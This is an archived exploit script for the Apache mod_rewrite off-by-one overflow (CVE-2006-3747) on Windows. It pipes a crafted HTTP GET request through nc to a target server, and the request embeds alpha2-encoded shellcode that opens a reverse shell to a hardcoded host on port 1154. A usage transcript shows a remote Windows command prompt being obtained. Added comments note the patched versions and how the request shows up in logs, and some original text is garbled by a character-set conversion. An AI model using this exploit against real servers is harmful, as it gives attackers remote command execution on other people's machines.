# Title : Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
# Published : 2007-04-07
# Author : axis
#!/bin/sh
# Exploit for Apache mod_rewrite off-by-one(Win32).
#
# by axis <axis@ph4nt0m>
# http://www.ph4nt0m.org
# 2007-04-06
#
# Tested on Apache 2.0.58 (Win32)
# Windows2003 CN SP1
#
# Vulnerable Apache Versions:
# * 1.3 branch: >1.3.28 and <1.3.37
# * 2.0 branch: >2.0.46 and <2.0.59
# * 2.2 branch: >2.2.0 and <2.2.3
#
# Defender's note: the ranges above imply the fix ships in 1.3.37, 2.0.59
# and 2.2.3; servers at or past those versions in their branch are not
# affected by this script. The request built at the bottom of this file is
# an ordinary HTTP GET whose path carries "ldap://" followed by repeated
# "%3f", so with the RewriteLog settings listed below it shows up in the
# rewrite log (and, presumably, in the access log) and can be alerted on.
#
# Vulnerability discovered by Mark Dowd.
# CVE-2006-3747
#
# first POC by jack <jackx40gulcasx2Eorg>
# 2006-08-20
# http://www.milw0rm.com/exploits/2237
#
#
#
# to successfully exploit the vuln,there are some conditions
# http://www.vuxml.org/freebsd/dc8c08c7-1e7c-11db-88cf-000c6ec775d9.html
#
#
# some compilers added padding to the stack, so they could not be exploited,like gcc under redhat
#
# for more details about the vuln please see:
# http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded
#
#
# no opcodes needed under windows!
# it will directly run our shellcode
#
# my apache config file
# [httpd.conf]:
# RewriteEngine on
# RewriteRule 1/(.*) $1
# RewriteLog "logs/rewrite.log"
# RewriteLogLevel 3
#
#
# Usage:
# [axis@security-lab2 xploits]$ sh mod_rewrite.sh 10.0.76.141
# mod_rewrite apache off-by-one overflow
#
# [axis@opensystemX axis]$ nc -vv -n -l -p 1154
# listening on [any] 1154 ...
# connect to [x.x.x.111] from (UNKNOWN) [10.0.76.141] 4077
# Microsoft Windows [????¨¤? 5.2.3790]
# (C) ???¡§¡§?¡ì?¡§¡ä¡§?D 1985-2003 Microsoft Corp.
# (The two lines above are the Windows command-prompt banner; the non-ASCII
# text in the original transcript was garbled by a character-set conversion.)
#
# D:ApacheApache2>exit
# exit
# sent 5, rcvd 100
#
#
#
# (Two comment lines that followed here were garbled by a character-set
# conversion and cannot be recovered verbatim. From the surviving fragments
# they describe the "bad characters" the author had to keep out of the
# encoded payload, naming 0x3f and 0x0b explicitly; the full list as given
# by the author is the line below.)
# 0x00 0x3a 0x22 0x3b 0x7d 0x7b 0x3c 0x3e 0x5c 0x5d 0x3f 0x0b
#
# NOTE: "echo -e" / "echo -ne" are not POSIX; under a strict /bin/sh the
# flags may be printed literally instead of being interpreted. The usage
# transcript above shows the author running the script with "sh".
echo -e "mod_rewrite apache off-by-one overflow"
# Exactly one argument (the target host) is required; anything else prints
# the usage line and exits (bare "exit", so the status is that of the
# preceding echo, normally 0).
if [ $# -ne 1 ] ; then
echo "Usage: $0 webserver"
exit
fi
host=$1
#use ldap:// to trigger the vuln, "Ph4nt0m" is any arbitrary string
#
# Everything from the opening quote on the next line to the closing quote on
# the "Host:" line is ONE double-quoted string: the lines beginning with "#"
# inside it are part of the data sent to the server, not shell comments, and
# the backtick `perl -e` substitutions are expanded before echo runs. The
# resulting request is piped to nc on port 80 of $host ($host is unquoted,
# so a plain hostname or IP as in the usage example is expected). The
# script's exit status is that of this final pipeline.
echo -ne "GET /1/ldap://ph4nt0m/`perl -e 'print "Ph4nt0m"x5'`
# %3f to trigger the vuln
%3fA%3fA%3f
#string "CCCC.." is any arbitrary string, use %3f to trigger the vuln
#%90 is the machine code we will jmp to(NOP),run shellcode from here
`perl -e 'print "C"x10'`%3fC%3f%90
# shellcode,reverse shell to 192.168.0.1 ,port 1154 alpha2 encoded
`perl -e 'print "
xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49
x49x49x49x49x49x49x49x49x49x37x49x49x51x5ax6ax63
x58x30x42x30x50x42x6bx42x41x73x42x32x42x41x41x32
x41x41x30x41x41x58x50x38x42x42x75x69x79x79x6cx51
x7ax6ax4bx50x4dx4dx38x6bx49x79x6fx49x6fx6bx4fx65
x30x4cx4bx72x4cx45x74x51x34x4ex6bx71x55x77x4cx6c
x4bx33x4cx64x45x33x48x64x41x5ax4fx4cx4bx72x6fx36
x78x4cx4bx73x6fx45x70x66x61x4ax4bx53x79x4ex6bx44
x74x4ex6bx73x31x38x6ex55x61x79x50x6cx59x6cx6cx4b
x34x6fx30x74x34x34x47x59x51x5ax6ax76x6dx76x61x6f
x32x5ax4bx79x64x55x6bx33x64x51x34x41x38x30x75x4b
x55x6ex6bx33x6fx44x64x46x61x7ax4bx32x46x6ex6bx34
x4cx42x6bx6ex6bx73x6fx77x6cx54x41x58x6bx43x33x74
x6cx6cx4bx4dx59x50x6cx74x64x75x4cx52x41x6fx33x50
x31x6bx6bx72x44x4cx4bx50x43x66x50x6cx4bx33x70x64
x4cx6cx4bx74x30x65x4cx4ex4dx4ex6bx53x70x47x78x33
x6ex51x78x4cx4ex52x6ex56x6ex58x6cx50x50x59x6fx79
x46x70x66x62x73x75x36x75x38x66x53x64x72x42x48x53
x47x32x53x50x32x71x4fx71x44x49x6fx48x50x52x48x5a
x6bx48x6dx6bx4cx65x6bx70x50x4bx4fx68x56x61x4fx4e
x69x4ax45x30x66x6ex61x78x6dx67x78x73x32x42x75x52
x4ax75x52x6bx4fx7ax70x61x78x6bx69x55x59x6cx35x6e
x4dx51x47x4bx4fx4ex36x70x53x50x53x56x33x76x33x43
x73x32x73x31x53x52x73x6bx4fx4ax70x70x68x6fx30x6d
x78x35x50x46x61x30x66x30x68x76x64x6cx42x33x56x70
x53x4ex69x78x61x4cx55x75x38x4ax4cx58x79x4cx6ax73
x50x53x67x6bx4fx6ax76x73x5ax72x30x73x61x53x65x4b
x4fx6ax70x52x46x31x7ax52x44x73x56x50x68x51x73x50
x6dx32x4ax62x70x51x49x47x59x6ax6cx6cx49x4bx57x42
x4ax73x74x6dx59x6dx32x35x61x6fx30x48x73x4fx5ax6f
x65x4cx49x39x6dx4bx4ex33x72x54x6dx6bx4ex33x72x34
x6cx6cx4dx50x7ax57x48x4ex4bx4cx6bx6cx6bx71x78x32
x52x6bx4ex6cx73x42x36x49x6fx73x45x65x78x6bx4fx6e
x36x71x4bx42x77x43x62x53x61x76x31x70x51x30x6ax35
x51x62x71x76x31x72x75x43x61x4bx4fx6ex30x73x58x4e
x4dx7ax79x37x75x38x4ex31x43x4bx4fx4ax76x30x6ax39
x6fx6bx4fx70x37x6bx4fx6ex30x45x38x39x77x54x39x79
x56x71x69x79x6fx53x45x56x64x69x6fx69x46x6bx4fx62
x57x6bx4cx4bx4fx6ax70x50x68x6ax50x6fx7ax37x74x43
x6fx72x73x4bx4fx6ax76x79x6fx38x50x63
"'`
HTTP/1.0rn
Host: $hostrnrn" | nc -vv $host 80